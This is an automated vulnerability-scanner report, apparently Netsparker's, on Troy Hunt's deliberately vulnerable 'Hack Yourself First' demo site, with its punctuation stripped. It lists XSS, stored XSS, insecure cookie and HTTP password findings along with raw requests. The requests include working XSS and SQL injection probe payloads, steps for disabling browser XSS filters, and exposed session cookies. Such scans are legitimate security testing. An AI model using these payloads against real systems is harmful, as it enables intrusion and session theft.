RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
